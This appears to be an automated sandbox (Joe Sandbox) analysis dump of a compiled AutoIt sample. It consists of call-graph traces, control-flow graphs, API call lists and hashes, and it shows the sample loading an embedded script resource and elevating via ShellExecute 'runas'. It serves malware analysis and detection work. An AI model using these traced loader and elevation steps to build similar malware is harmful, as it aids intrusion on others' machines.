94678->94611 94679->94618 94680->94618 94681->94630 94683 eb6918 _wcschr __ftell_nolock 94682->94683 94684 e91dfc __wsplitpath 47 API calls 94683->94684 94687 eb692e _wcscat _wcscpy 94683->94687 94685 eb695d 94684->94685 94686 e91dfc __wsplitpath 47 API calls 94685->94686 94686->94687 94687->94664 94689 ebbfb1 __ftell_nolock 94688->94689 94690 e8f4ea 48 API calls 94689->94690 94691 ebc00e 94690->94691 94692 e747b7 48 API calls 94691->94692 94693 ebc018 94692->94693 94694 ebbdb4 GetSystemTimeAsFileTime 94693->94694 94695 ebc023 94694->94695 94696 e74517 83 API calls 94695->94696 94697 ebc036 _wcscmp 94696->94697 94698 ebc05a 94697->94698 94699 ebc107 94697->94699 94700 ebc56d 94 API calls 94698->94700 94701 ebc56d 94 API calls 94699->94701 94702 ebc05f 94700->94702 94703 ebc0d3 _wcscat 94701->94703 94704 e91dfc __wsplitpath 47 API calls 94702->94704 94726 ebc110 94702->94726 94705 e744ed 64 API calls 94703->94705 94703->94726 94709 ebc088 _wcscat _wcscpy 94704->94709 94706 ebc12c 94705->94706 94707 e744ed 64 API calls 94706->94707 94708 ebc13c 94707->94708 94710 e744ed 64 API calls 94708->94710 94711 e91dfc __wsplitpath 47 API calls 94709->94711 94712 ebc157 94710->94712 94711->94703 94713 e744ed 64 API calls 94712->94713 94714 ebc167 94713->94714 94715 e744ed 64 API calls 94714->94715 94716 ebc182 94715->94716 94717 e744ed 64 API calls 94716->94717 94718 ebc192 94717->94718 94719 e744ed 64 API calls 94718->94719 94720 ebc1a2 94719->94720 94721 e744ed 64 API calls 94720->94721 94722 ebc1b2 94721->94722 94746 ebc71a GetTempPathW GetTempFileNameW 94722->94746 94724 ebc1be 94725 e93499 117 API calls 94724->94725 94736 ebc1cf 94725->94736 94726->94670 94727 ebc289 94728 e935e4 __fcloseall 83 API calls 94727->94728 94729 ebc294 94728->94729 94731 ebc29a DeleteFileW 94729->94731 94732 ebc2ae 94729->94732 94730 e744ed 64 API calls 94730->94736 94731->94726 94733 ebc342 CopyFileW 94732->94733 94738 ebc2b8 94732->94738 94734 ebc36a DeleteFileW 94733->94734 94735 ebc358 DeleteFileW 94733->94735 94760 ebc6d9 CreateFileW 94734->94760 94735->94726 94736->94726 94736->94727 94736->94730 94747 e92aae 94736->94747 94763 ebb965 118 API calls __fcloseall 94738->94763 94741 ebc32d 94741->94734 94742 ebc331 DeleteFileW 94741->94742 94742->94726 94743->94633 94744->94657 94745->94661 94746->94724 94748 e92aba _raise 94747->94748 94749 e92aec 94748->94749 94750 e92ad4 94748->94750 94759 e92ae4 _raise 94748->94759 94751 e94e1c __lock_file 48 API calls 94749->94751 94776 e97c0e 47 API calls __getptd_noexit 94750->94776 94753 e92af2 94751->94753 94764 e92957 94753->94764 94754 e92ad9 94777 e96e10 8 API calls _raise 94754->94777 94759->94736 94761 ebc6ff SetFileTime CloseHandle 94760->94761 94762 ebc715 94760->94762 94761->94762 94762->94726 94763->94741 94767 e92966 94764->94767 94772 e92984 94764->94772 94765 e92974 94779 e97c0e 47 API calls __getptd_noexit 94765->94779 94767->94765 94769 e9299c ___crtGetEnvironmentStringsW 94767->94769 94767->94772 94768 e92979 94780 e96e10 8 API calls _raise 94768->94780 94769->94772 94773 e92c84 __flush 78 API calls 94769->94773 94774 e92933 __flush 47 API calls 94769->94774 94775 e9af61 __flush 78 API calls 94769->94775 94781 e98e63 78 API calls 5 library calls 94769->94781 94778 e92b24 LeaveCriticalSection LeaveCriticalSection _fseek 94772->94778 94773->94769 94774->94769 94775->94769 94776->94754 94777->94759 94778->94759 94779->94768 94780->94772 94781->94769 94783 eb6cc4 FindFirstFileW 94782->94783 94785 eb6529 94782->94785 94784 eb6cd9 FindClose 94783->94784 94783->94785 94784->94785 94785->94494 94787 e7bd3f 94786->94787 94790 e7bd5a 94786->94790 94788 e7bdfa 48 API calls 94787->94788 94789 e7bd47 CharUpperBuffW 94788->94789 94789->94790 94790->94501 94792 ee436a 94791->94792 94793 e72b8b 94791->94793 94794 e8f4ea 48 API calls 94793->94794 94795 e72b92 94794->94795 94796 e72bb3 94795->94796 94822 e72bce 48 API calls 94795->94822 94796->94522 94798->94508 94799->94563 94800->94559 94801->94559 94802->94559 94803->94570 94804->94508 94805->94563 94806->94551 94807->94551 94808->94509 94809->94563 94810->94535 94811->94563 94812->94563 94813->94563 94814->94559 94815->94559 94816->94559 94817->94559 94818->94563 94819->94555 94820->94564 94821->94563 94822->94796 94823->93520 94824 ee19ba 94829 e8c75a 94824->94829 94828 ee19c9 94830 e7d7f7 48 API calls 94829->94830 94831 e8c7c8 94830->94831 94837 e8d26c 94831->94837 94834 e8c865 94835 e8c881 94834->94835 94840 e8d1fa 48 API calls ___crtGetEnvironmentStringsW 94834->94840 94836 e90f0a 52 API calls __cinit 94835->94836 94836->94828 94841 e8d298 94837->94841 94840->94834 94842 e8d28b 94841->94842 94843 e8d2a5 94841->94843 94842->94834 94843->94842 94844 e8d2ac RegOpenKeyExW 94843->94844 94844->94842 94845 e8d2c6 RegQueryValueExW 94844->94845 94846 e8d2fc RegCloseKey 94845->94846 94847 e8d2e7 94845->94847 94846->94842 94847->94846 94848 ee19cb 94853 e72322 94848->94853 94850 ee19d1 94886 e90f0a 52 API calls __cinit 94850->94886 94852 ee19db 94854 e72344 94853->94854 94887 e726df 94854->94887 94859 e7d7f7 48 API calls 94860 e72384 94859->94860 94861 e7d7f7 48 API calls 94860->94861 94862 e7238e 94861->94862 94863 e7d7f7 48 API calls 94862->94863 94864 e72398 94863->94864 94865 e7d7f7 48 API calls 94864->94865 94866 e723de 94865->94866 94867 e7d7f7 48 API calls 94866->94867 94868 e724c1 94867->94868 94895 e7263f 94868->94895 94872 e724f1 94873 e7d7f7 48 API calls 94872->94873 94874 e724fb 94873->94874 94924 e72745 94874->94924 94876 e72546 94877 e72556 GetStdHandle 94876->94877 94878 ee501d 94877->94878 94879 e725b1 94877->94879 94878->94879 94881 ee5026 94878->94881 94880 e725b7 CoInitialize 94879->94880 94880->94850 94931 eb92d4 53 API calls 94881->94931 94883 ee502d 94932 eb99f9 CreateThread 94883->94932 94885 ee5039 CloseHandle 94885->94880 94886->94852 94933 e72854 94887->94933 94890 e76a63 48 API calls 94891 e7234a 94890->94891 94892 e7272e 94891->94892 94947 e727ec 6 API calls 94892->94947 94894 e7237a 94894->94859 94896 e7d7f7 48 API calls 94895->94896 94897 e7264f 94896->94897 94898 e7d7f7 48 API calls 94897->94898 94899 e72657 94898->94899 94948 e726a7 94899->94948 94902 e726a7 48 API calls 94903 e72667 94902->94903 94904 e7d7f7 48 API calls 94903->94904 94905 e72672 94904->94905 94906 e8f4ea 48 API calls 94905->94906 94907 e724cb 94906->94907 94908 e722a4 94907->94908 94909 e722b2 94908->94909 94910 e7d7f7 48 API calls 94909->94910 94911 e722bd 94910->94911 94912 e7d7f7 48 API calls 94911->94912 94913 e722c8 94912->94913 94914 e7d7f7 48 API calls 94913->94914 94915 e722d3 94914->94915 94916 e7d7f7 48 API calls 94915->94916 94917 e722de 94916->94917 94918 e726a7 48 API calls 94917->94918 94919 e722e9 94918->94919 94920 e8f4ea 48 API calls 94919->94920 94921 e722f0 94920->94921 94922 ee1fe7 94921->94922 94923 e722f9 RegisterWindowMessageW 94921->94923 94923->94872 94925 e72755 94924->94925 94926 ee5f4d 94924->94926 94927 e8f4ea 48 API calls 94925->94927 94953 ebc942 50 API calls 94926->94953 94929 e7275d 94927->94929 94929->94876 94930 ee5f58 94931->94883 94932->94885 94954 eb99df 54 API calls 94932->94954 94940 e72870 94933->94940 94936 e72870 48 API calls 94937 e72864 94936->94937 94938 e7d7f7 48 API calls 94937->94938 94939 e72716 94938->94939 94939->94890 94941 e7d7f7 48 API calls 94940->94941 94942 e7287b 94941->94942 94943 e7d7f7 48 API calls 94942->94943 94944 e72883 94943->94944 94945 e7d7f7 48 API calls 94944->94945 94946 e7285c 94945->94946 94946->94936 94947->94894 94949 e7d7f7 48 API calls 94948->94949 94950 e726b0 94949->94950 94951 e7d7f7 48 API calls 94950->94951 94952 e7265f 94951->94952 94952->94902 94953->94930 94955 ee197b 94960 e8dd94 94955->94960 94959 ee198a 94961 e8f4ea 48 API calls 94960->94961 94962 e8dd9c 94961->94962 94963 e8ddb0 94962->94963 94968 e8df3d 94962->94968 94967 e90f0a 52 API calls __cinit 94963->94967 94967->94959 94969 e8df46 94968->94969 94971 e8dda8 94968->94971 95000 e90f0a 52 API calls __cinit 94969->95000 94972 e8ddc0 94971->94972 94973 e7d7f7 48 API calls 94972->94973 94974 e8ddd7 GetVersionExW 94973->94974 94975 e76a63 48 API calls 94974->94975 94976 e8de1a 94975->94976 95001 e8dfb4 94976->95001 94979 e76571 48 API calls 94980 e8de2e 94979->94980 94982 ee24c8 94980->94982 95005 e8df77 94980->95005 94984 e8dea4 GetCurrentProcess 95014 e8df5f LoadLibraryA GetProcAddress 94984->95014 94986 e8df31 GetSystemInfo 94988 e8df0e 94986->94988 94987 e8dee3 95008 e8e00c 94987->95008 94991 e8df1c FreeLibrary 94988->94991 94992 e8df21 94988->94992 94991->94992 94992->94963 94993 e8debb 94993->94986 94993->94987 94994 e8df29 GetSystemInfo 94996 e8df03 94994->94996 94995 e8def9 95011 e8dff4 94995->95011 94996->94988 94999 e8df09 FreeLibrary 94996->94999 94999->94988 95000->94971 95002 e8dfbd 95001->95002 95003 e7b18b 48 API calls 95002->95003 95004 e8de22 95003->95004 95004->94979 95015 e8df89 95005->95015 95019 e8e01e 95008->95019 95012 e8e00c 2 API calls 95011->95012 95013 e8df01 GetNativeSystemInfo 95012->95013 95013->94996 95014->94993 95016 e8dea0 95015->95016 95017 e8df92 LoadLibraryA 95015->95017 95016->94984 95016->94993 95017->95016 95018 e8dfa3 GetProcAddress 95017->95018 95018->95016 95020 e8def1 95019->95020 95021 e8e027 LoadLibraryA 95019->95021 95020->94994 95020->94995 95021->95020 95022 e8e038 GetProcAddress 95021->95022 95022->95020 95023 e73742 95024 e7374b 95023->95024 95025 e73769 95024->95025 95026 e737c8 95024->95026 95067 e737c6 95024->95067 95030 e73776 95025->95030 95031 e7382c PostQuitMessage 95025->95031 95028 e737ce 95026->95028 95029 ee1e00 95026->95029 95027 e737ab DefWindowProcW 95032 e737b9 95027->95032 95033 e737f6 SetTimer RegisterWindowMessageW 95028->95033 95034 e737d3 95028->95034 95072 e72ff6 16 API calls 95029->95072 95036 ee1e88 95030->95036 95037 e73781 95030->95037 95031->95032 95033->95032 95041 e7381f CreatePopupMenu 95033->95041 95038 ee1da3 95034->95038 95039 e737da KillTimer 95034->95039 95077 eb4ddd 60 API calls _memset 95036->95077 95042 e73836 95037->95042 95043 e73789 95037->95043 95047 ee1ddc MoveWindow 95038->95047 95048 ee1da8 95038->95048 95068 e73847 Shell_NotifyIconW _memset 95039->95068 95040 ee1e27 95073 e8e312 335 API calls Mailbox 95040->95073 95041->95032 95070 e8eb83 53 API calls _memset 95042->95070 95051 ee1e6d 95043->95051 95052 e73794 95043->95052 95045 ee1e9a 95045->95027 95045->95032 95047->95032 95056 ee1dac 95048->95056 95057 ee1dcb SetFocus 95048->95057 95051->95027 95076 eaa5f3 48 API calls 95051->95076 95053 ee1e58 95052->95053 95054 e7379f 95052->95054 95075 eb55bd 70 API calls _memset 95053->95075 95054->95027 95074 e73847 Shell_NotifyIconW _memset 95054->95074 95055 e73845 95055->95032 95056->95054 95059 ee1db5 95056->95059 95057->95032 95058 e737ed 95069 e7390f DeleteObject DestroyWindow Mailbox 95058->95069 95071 e72ff6 16 API calls 95059->95071 95065 ee1e4c 95066 e74ffc 67 API calls 95065->95066 95066->95067 95067->95027 95068->95058 95069->95032 95070->95055 95071->95032 95072->95040 95073->95054 95074->95065 95075->95055 95076->95067 95077->95045 95078 ee8eb8 95082 eba635 95078->95082 95080 ee8ec3 95081 eba635 84 API calls 95080->95081 95081->95080 95083 eba66f 95082->95083 95087 eba642 95082->95087 95083->95080 95084 eba671 95094 e8ec4e 81 API calls 95084->95094 95085 eba676 95088 e7936c 81 API calls 95085->95088 95087->95083 95087->95084 95087->95085 95091 eba669 95087->95091 95089 eba67d 95088->95089 95090 e7510d 48 API calls 95089->95090 95090->95083 95093 e84525 61 API calls ___crtGetEnvironmentStringsW 95091->95093 95093->95083 95094->95085 95095 17ce7b0 95109 17cc400 95095->95109 95097 17ce865 95112 17ce6a0 95097->95112 95111 17cca8b 95109->95111 95115 17cf890 GetPEB 95109->95115 95111->95097 95113 17ce6a9 Sleep 95112->95113 95114 17ce6b7 95113->95114 95115->95111 95116 ebbb64 95117 ebbb77 95116->95117 95118 ebbb71 95116->95118 95120 e91c9d _free 47 API calls 95117->95120 95121 ebbb88 95117->95121 95119 e91c9d _free 47 API calls 95118->95119 95119->95117 95120->95121 95122 e91c9d _free 47 API calls 95121->95122 95123 ebbb9a 95121->95123 95122->95123

                                                                        Executed Functions

                                                                        Function 00E9B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 643 e9b043-e9b080 call e9f8a0 646 e9b089-e9b08b 643->646 647 e9b082-e9b084 643->647 648 e9b08d-e9b0a7 call e97bda call e97c0e call e96e10 646->648 649 e9b0ac-e9b0d9 646->649 650 e9b860-e9b86c call e9a70c 647->650 648->650 652 e9b0db-e9b0de 649->652 653 e9b0e0-e9b0e7 649->653 652->653 656 e9b10b-e9b110 652->656 657 e9b0e9-e9b100 call e97bda call e97c0e call e96e10 653->657 658 e9b105 653->658 661 e9b11f-e9b12d call ea3bf2 656->661 662 e9b112-e9b11c call e9f82f 656->662 686 e9b851-e9b854 657->686 658->656 673 e9b44b-e9b45d 661->673 674 e9b133-e9b145 661->674 662->661 677 e9b7b8-e9b7d5 WriteFile 673->677 678 e9b463-e9b473 673->678 674->673 676 e9b14b-e9b183 call e97a0d GetConsoleMode 674->676 676->673 699 e9b189-e9b18f 676->699 681 e9b7e1-e9b7e7 GetLastError 677->681 682 e9b7d7-e9b7df 677->682 684 e9b479-e9b484 678->684 685 e9b55a-e9b55f 678->685 687 e9b7e9 681->687 682->687 691 e9b81b-e9b833 684->691 692 e9b48a-e9b49a 684->692 688 e9b663-e9b66e 685->688 689 e9b565-e9b56e 685->689 698 e9b85e-e9b85f 686->698 696 e9b7ef-e9b7f1 687->696 688->691 695 e9b674 688->695 689->691 697 e9b574 689->697 693 e9b83e-e9b84e call e97c0e call e97bda 691->693 694 e9b835-e9b838 691->694 700 e9b4a0-e9b4a3 692->700 693->686 694->693 703 e9b83a-e9b83c 694->703 704 e9b67e-e9b693 695->704 706 e9b7f3-e9b7f5 696->706 707 e9b856-e9b85c 696->707 708 e9b57e-e9b595 697->708 698->650 709 e9b199-e9b1bc GetConsoleCP 699->709 710 e9b191-e9b193 699->710 701 e9b4e9-e9b520 WriteFile 700->701 702 e9b4a5-e9b4be 700->702 701->681 715 e9b526-e9b538 701->715 713 e9b4cb-e9b4e7 702->713 714 e9b4c0-e9b4ca 702->714 703->698 716 e9b699-e9b69b 704->716 706->691 718 e9b7f7-e9b7fc 706->718 707->698 719 e9b59b-e9b59e 708->719 711 e9b440-e9b446 709->711 712 e9b1c2-e9b1ca 709->712 710->673 710->709 711->706 720 e9b1d4-e9b1d6 712->720 713->700 713->701 714->713 715->696 721 e9b53e-e9b54f 715->721 722 e9b6d8-e9b719 WideCharToMultiByte 716->722 723 e9b69d-e9b6b3 716->723 725 e9b7fe-e9b810 call e97c0e call e97bda 718->725 726 e9b812-e9b819 call e97bed 718->726 727 e9b5de-e9b627 WriteFile 719->727 728 e9b5a0-e9b5b6 719->728 731 e9b36b-e9b36e 720->731 732 e9b1dc-e9b1fe 720->732 721->692 733 e9b555 721->733 722->681 737 e9b71f-e9b721 722->737 734 e9b6b5-e9b6c4 723->734 735 e9b6c7-e9b6d6 723->735 725->686 726->686 727->681 730 e9b62d-e9b645 727->730 739 e9b5b8-e9b5ca 728->739 740 e9b5cd-e9b5dc 728->740 730->696 742 e9b64b-e9b658 730->742 745 e9b370-e9b373 731->745 746 e9b375-e9b3a2 731->746 743 e9b200-e9b215 732->743 744 e9b217-e9b223 call e91688 732->744 733->696 734->735 735->716 735->722 747 e9b727-e9b75a WriteFile 737->747 739->740 740->719 740->727 742->708 749 e9b65e 742->749 750 e9b271-e9b283 call ea40f7 743->750 764 e9b269-e9b26b 744->764 765 e9b225-e9b239 744->765 745->746 752 e9b3a8-e9b3ab 745->752 746->752 753 e9b77a-e9b78e GetLastError 747->753 754 e9b75c-e9b776 747->754 749->696 769 e9b289 750->769 770 e9b435-e9b43b 750->770 758 e9b3ad-e9b3b0 752->758 759 e9b3b2-e9b3c5 call ea5884 752->759 756 e9b794-e9b796 753->756 754->747 761 e9b778 754->761 756->687 763 e9b798-e9b7b0 756->763 758->759 766 e9b407-e9b40a 758->766 759->681 776 e9b3cb-e9b3d5 759->776 761->756 763->704 771 e9b7b6 763->771 764->750 773 e9b23f-e9b254 call ea40f7 765->773 774 e9b412-e9b42d 765->774 766->720 772 e9b410 766->772 777 e9b28f-e9b2c4 WideCharToMultiByte 769->777 770->687 771->696 772->770 773->770 785 e9b25a-e9b267 773->785 774->770 779 e9b3fb-e9b401 776->779 780 e9b3d7-e9b3ee call ea5884 776->780 777->770 781 e9b2ca-e9b2f0 WriteFile 777->781 779->766 780->681 788 e9b3f4-e9b3f5 780->788 781->681 784 e9b2f6-e9b30e 781->784 784->770 787 e9b314-e9b31b 784->787 785->777 787->779 789 e9b321-e9b34c WriteFile 787->789 788->779 789->681 790 e9b352-e9b359 789->790 790->770 791 e9b35f-e9b366 790->791 791->779
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cc31aec3d8bb350e3a726dde465cb367e64b8999a9985a0485dced6496cfa58
                                                                        • Instruction ID: a4aaec9244466c32deea0d069c8050ace76a2dc57c08f762c23f3ef9adbf83af
                                                                        • Opcode Fuzzy Hash: 8cc31aec3d8bb350e3a726dde465cb367e64b8999a9985a0485dced6496cfa58
                                                                        • Instruction Fuzzy Hash: 17323875A022288BDF24CF54ED816E9B7F5FB4A314F1851DAE40AE7A91D7309E80CF52
                                                                        Function 00E73D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00E73AA3,?), ref: 00E73D45
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00E73AA3,?), ref: 00E73D57
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F31148,00F31130,?,?,?,?,00E73AA3,?), ref: 00E73DC8
                                                                          • Part of subcall function 00E76430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E73DEE,00F31148,?,?,?,?,?,00E73AA3,?), ref: 00E76471
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00E73AA3,?), ref: 00E73E48
                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F228F4,00000010), ref: 00EE1CCE
                                                                        • SetCurrentDirectoryW.KERNEL32(?,00F31148,?,?,?,?,?,00E73AA3,?), ref: 00EE1D06
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F0DAB4,00F31148,?,?,?,?,?,00E73AA3,?), ref: 00EE1D89
                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00E73AA3), ref: 00EE1D90
                                                                          • Part of subcall function 00E73E6E: GetSysColorBrush.USER32(0000000F), ref: 00E73E79
                                                                          • Part of subcall function 00E73E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00E73E88
                                                                          • Part of subcall function 00E73E6E: LoadIconW.USER32(00000063), ref: 00E73E9E
                                                                          • Part of subcall function 00E73E6E: LoadIconW.USER32(000000A4), ref: 00E73EB0
                                                                          • Part of subcall function 00E73E6E: LoadIconW.USER32(000000A2), ref: 00E73EC2
                                                                          • Part of subcall function 00E73E6E: RegisterClassExW.USER32(?), ref: 00E73F30
                                                                          • Part of subcall function 00E736B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E736E6
                                                                          • Part of subcall function 00E736B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73707
                                                                          • Part of subcall function 00E736B8: ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E7371B
                                                                          • Part of subcall function 00E736B8: ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E73724
                                                                          • Part of subcall function 00E74FFC: _memset.LIBCMT ref: 00E75022
                                                                          • Part of subcall function 00E74FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E750CB
                                                                        Strings
                                                                        • runas, xrefs: 00EE1D84
                                                                        • This is a third-party compiled AutoIt script., xrefs: 00EE1CC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 438480954-3287110873
                                                                        • Opcode ID: 120e101ca279de62c51f1c5bf66cc0e44bf550e33955bafc0f70e1f2b93d22c2
                                                                        • Instruction ID: c87315370dd9b29ff77f2ae8caaa69563b3809c176b9ea8ea6103a2716779579
                                                                        • Opcode Fuzzy Hash: 120e101ca279de62c51f1c5bf66cc0e44bf550e33955bafc0f70e1f2b93d22c2
                                                                        • Instruction Fuzzy Hash: 5A511831A04348AECB11BBB0DC41DED7BBAEF05724F10E065F609761A2DB708645F722
                                                                        Function 00E8DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1075 e8ddc0-e8de4f call e7d7f7 GetVersionExW call e76a63 call e8dfb4 call e76571 1084 ee24c8-ee24cb 1075->1084 1085 e8de55-e8de56 1075->1085 1088 ee24cd 1084->1088 1089 ee24e4-ee24e8 1084->1089 1086 e8de58-e8de63 1085->1086 1087 e8de92-e8dea2 call e8df77 1085->1087 1093 ee244e-ee2454 1086->1093 1094 e8de69-e8de6b 1086->1094 1106 e8dea4-e8dec1 GetCurrentProcess call e8df5f 1087->1106 1107 e8dec7-e8dee1 1087->1107 1090 ee24d0 1088->1090 1091 ee24ea-ee24f3 1089->1091 1092 ee24d3-ee24dc 1089->1092 1090->1092 1091->1090 1098 ee24f5-ee24f8 1091->1098 1092->1089 1096 ee245e-ee2464 1093->1096 1097 ee2456-ee2459 1093->1097 1099 ee2469-ee2475 1094->1099 1100 e8de71-e8de74 1094->1100 1096->1087 1097->1087 1098->1092 1102 ee247f-ee2485 1099->1102 1103 ee2477-ee247a 1099->1103 1104 e8de7a-e8de89 1100->1104 1105 ee2495-ee2498 1100->1105 1102->1087 1103->1087 1111 ee248a-ee2490 1104->1111 1112 e8de8f 1104->1112 1105->1087 1113 ee249e-ee24b3 1105->1113 1106->1107 1126 e8dec3 1106->1126 1109 e8df31-e8df3b GetSystemInfo 1107->1109 1110 e8dee3-e8def7 call e8e00c 1107->1110 1115 e8df0e-e8df1a 1109->1115 1123 e8df29-e8df2f GetSystemInfo 1110->1123 1124 e8def9-e8df01 call e8dff4 GetNativeSystemInfo 1110->1124 1111->1087 1112->1087 1117 ee24bd-ee24c3 1113->1117 1118 ee24b5-ee24b8 1113->1118 1120 e8df1c-e8df1f FreeLibrary 1115->1120 1121 e8df21-e8df26 1115->1121 1117->1087 1118->1087 1120->1121 1125 e8df03-e8df07 1123->1125 1124->1125 1125->1115 1129 e8df09-e8df0c FreeLibrary 1125->1129 1126->1107 1129->1115
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 00E8DDEC
                                                                        • GetCurrentProcess.KERNEL32(00000000,00F0DC38,?,?), ref: 00E8DEAC
                                                                        • GetNativeSystemInfo.KERNELBASE(?,00F0DC38,?,?), ref: 00E8DF01
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E8DF0C
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E8DF1F
                                                                        • GetSystemInfo.KERNEL32(?,00F0DC38,?,?), ref: 00E8DF29
                                                                        • GetSystemInfo.KERNEL32(?,00F0DC38,?,?), ref: 00E8DF35
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                        • String ID:
                                                                        • API String ID: 3851250370-0
                                                                        • Opcode ID: 4f46228802f1111ed2d8cec6bb240952a07945bab9fa06c5fb0b5efe28cff050
                                                                        • Instruction ID: 37d1abd26c3f40da7d1ffbb1cc6c85eac522c0e38c3dd1d8f6a404b5ed847819
                                                                        • Opcode Fuzzy Hash: 4f46228802f1111ed2d8cec6bb240952a07945bab9fa06c5fb0b5efe28cff050
                                                                        • Instruction Fuzzy Hash: FF61C2B190A3C8DFCF15DF6898C01E9BFB46F29304B1999D8D84DAF287C624C908CB65
                                                                        Function 00E7406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1147 e7406b-e74083 CreateStreamOnHGlobal 1148 e74085-e7409c FindResourceExW 1147->1148 1149 e740a3-e740a6 1147->1149 1150 e740a2 1148->1150 1151 ee4f16-ee4f25 LoadResource 1148->1151 1150->1149 1151->1150 1152 ee4f2b-ee4f39 SizeofResource 1151->1152 1152->1150 1153 ee4f3f-ee4f4a LockResource 1152->1153 1153->1150 1154 ee4f50-ee4f6e 1153->1154 1154->1150
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E7449E,?,?,00000000,00000001), ref: 00E7407B
                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E7449E,?,?,00000000,00000001), ref: 00E74092
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00E7449E,?,?,00000000,00000001,?,?,?,?,?,?,00E741FB), ref: 00EE4F1A
                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00E7449E,?,?,00000000,00000001,?,?,?,?,?,?,00E741FB), ref: 00EE4F2F
                                                                        • LockResource.KERNEL32(00E7449E,?,?,00E7449E,?,?,00000000,00000001,?,?,?,?,?,?,00E741FB,00000000), ref: 00EE4F42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
